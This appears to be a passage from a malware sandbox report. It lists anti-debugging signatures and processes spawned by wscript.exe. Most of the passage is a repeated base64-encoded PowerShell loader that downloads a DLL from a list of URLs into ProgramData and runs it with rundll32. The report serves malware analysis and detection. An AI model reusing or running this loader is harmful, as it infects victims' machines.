ABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 15, 2023, 9:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
parent_process	wscript.exe				martian_process	powershell -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQ